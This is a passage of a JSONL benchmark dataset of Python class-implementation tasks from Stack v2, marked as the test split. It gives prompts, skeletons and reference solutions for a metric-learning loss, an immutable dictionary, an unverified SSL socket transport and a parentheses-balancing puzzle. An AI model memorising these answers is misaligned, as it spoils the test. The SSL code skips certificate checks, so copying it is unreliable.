sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_Confusezius_Deep_Metric_Learning_Baselines.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "ae5bf63ab906639b1019c584f295a456ac4a63cd", "bodies": ["if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\nsuper(ImmutableDictionary, self).__init__(dictionary)", "if name in self:\n return self[name]\ntry:\n return self[name]\nexcept KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))"], "bodies_text": "<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ImmutableDictionary", "detected_licenses": ["GPL-1.0-or-later", "GPL-2.0-or-later", "OFL-1.1", "MS-PL", "AFL-2.1", "GPL-2.0-only", "Python-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause", "LicenseRef-scancode-free-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000497", "length_bytes": 7150, "license_type": "permissive", "methods": [{"docstring": "Recursively turn dict to ImmutableDictionary", "name": "__init__", "signature": "def __init__(self, dictionary)"}, {"docstring": "Access to self['attribute'] as self.attribute", "name": "__getattr__", "signature": "def __getattr__(self, name)"}], "n_methods": 2, "prompt": "Implement the Python class `ImmutableDictionary` described below.\n\nClass description:\nImplement the ImmutableDictionary class.\n\nMethod signatures and docstrings:\n- def __init__(self, dictionary): Recursively turn dict to ImmutableDictionary\n- def __getattr__(self, name): Access to self['attribute'] as self.attribute", "prompted_full_text": "Implement the Python class `ImmutableDictionary` described below.\n\nClass description:\nImplement the ImmutableDictionary class.\n\nMethod signatures and docstrings:\n- def __init__(self, dictionary): Recursively turn dict to ImmutableDictionary\n- def __getattr__(self, name): Access to self['attribute'] as self.attribute\n\n<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "revision_id": "23881f23577a65de396238998e8672d6c4c5a250", "skeleton": "<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ImmutableDictionary:\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n", "source": "the_stack_v2_python_sparse", "source_path": "ambari-agent/src/main/python/ambari_agent/Utils.py", "source_repo": "apache/ambari", "split": "test", "star_events_count": 2078} {"blob_id": "6da4425102b6b5847d98115febd4c17c7c8654bf", "bodies": ["if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\nelse:\n self.sslobj = socket.ssl(self.sock)", "result = self.sslobj.read(n)\nwhile len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\nreturn result", "while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]"], "bodies_text": "<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "class_docstring": "Transport that works over SSL", "class_name": "SSLTransport", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000498", "length_bytes": 5384, "license_type": "permissive", "methods": [{"docstring": "Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.", "name": "_setup_transport", "signature": "def _setup_transport(self)"}, {"docstring": "It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.", "name": "_read", "signature": "def _read(self, n)"}, {"docstring": "Write a string out to the SSL socket fully.", "name": "_write", "signature": "def _write(self, s)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007138", "prompt": "Implement the Python class `SSLTransport` described below.\n\nClass description:\nTransport that works over SSL\n\nMethod signatures and docstrings:\n- def _setup_transport(self): Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\n- def _read(self, n): It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\n- def _write(self, s): Write a string out to the SSL socket fully.", "prompted_full_text": "Implement the Python class `SSLTransport` described below.\n\nClass description:\nTransport that works over SSL\n\nMethod signatures and docstrings:\n- def _setup_transport(self): Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\n- def _read(self, n): It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\n- def _write(self, s): Write a string out to the SSL socket fully.\n\n<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "revision_id": "37444fb16b36743c439b0d6c3cac2347e0cc0a94", "skeleton": "<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n", "source": "the_stack_v2_python_sparse", "source_path": "vendor/amqplib/client_0_8/transport.py", "source_repo": "bopopescu/cc-2", "split": "test", "star_events_count": 0} {"blob_id": "5733999d4b86225b12dfd80042180415e535018e", "bodies": ["ans = bal = 0\nfor symbol in S:\n bal += 1 if symbol == '(' else -1\n if bal == -1:\n ans += 1\n bal += 1\nreturn ans + bal", "while '()' in S:\n S = S.replace('()', '')\nreturn len(S)"], "bodies_text": "<|body_start_0|>\n ans = bal = 0\n for symbol in S:\n bal += 1 if symbol == '(' else -1\n if bal == -1:\n ans += 1\n bal += 1\n return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n while '()' in S:\n S = S.replace('()', '')\n return len(S)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minAddToMakeValid(self, S):\n \"\"\"解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\"\"\"\n <|body_0|>\n\n def minAddToMakeValid1(self, S):\n \"\"\"比较简单理解的方法\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = bal = 0\n for symbol in S:\n bal += 1 if symbol == '(' else -1\n if bal == -1:\n ans += 1\n bal += 1\n return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n while '()' in S:\n S = S.replace('()', '')\n return len(S)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000499", "length_bytes": 1364, "license_type": "no_license", "methods": [{"docstring": "解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。", "name": "minAddToMakeValid", "signature": "def minAddToMakeValid(self, S)"}, {"docstring": "比较简单理解的方法", "name": "minAddToMakeValid1", "signature": "def minAddToMakeValid1(self, S)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minAddToMakeValid(self, S): 解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\n- def minAddToMakeValid1(self, S): 比较简单理解的方法", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minAddToMakeValid(self, S): 解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\n- def minAddToMakeValid1(self, S): 比较简单理解的方法\n\n<|skeleton|>\nclass Solution:\n\n def minAddToMakeValid(self, S):\n \"\"\"解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\"\"\"\n <|body_0|>\n\n def minAddToMakeValid1(self, S):\n \"\"\"比较简单理解的方法\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = bal = 0\n for symbol in S:\n bal += 1 if symbol == '(' else -1\n if bal == -1:\n ans += 1\n bal += 1\n return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n while '()' in S:\n S = S.replace('()', '')\n return len(S)\n<|end_body_1|>\n", "revision_id": "18c06a96bb14688e4a1d5fb6baf235a6b53bd3ae", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minAddToMakeValid(self, S):\n \"\"\"解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\"\"\"\n <|body_0|>\n\n def minAddToMakeValid1(self, S):\n \"\"\"比较简单理解的方法\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minAddToMakeValid(self, S):\n \"\"\"解法1:利用)不能再匹配成功的原理,用bal计数balance当前的结果。 比较技巧性的解法,bal维持一个balance,一直在-1,0,n之间浮动 symobol = '('则+1,=')'则-1, bal=0,代表目前凑对成功, bal=-1代表目前剩余一个')',此时就ans+=1,把这个多余的')'计数到最后结果,因为)不可能再匹配成功了,且bal+=1置为0 bal=n,代表剩余n个'(',还有希望匹配成功。\"\"\"\n ans = bal = 0\n for symbol in S:\n bal += 1 if symbol == '(' else -1\n if bal == -1:\n ans += 1\n bal += 1\n return ans + bal\n\n def minAddToMakeValid1(self, S):\n \"\"\"比较简单理解的方法\"\"\"\n while '()' in S:\n S = S.replace('()', '')\n return len(S)\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/others/minimum-add-to-make-parentheses-valid.py", "source_repo": "congyingTech/Basic-Algorithm", "split": "test", "star_events_count": 10}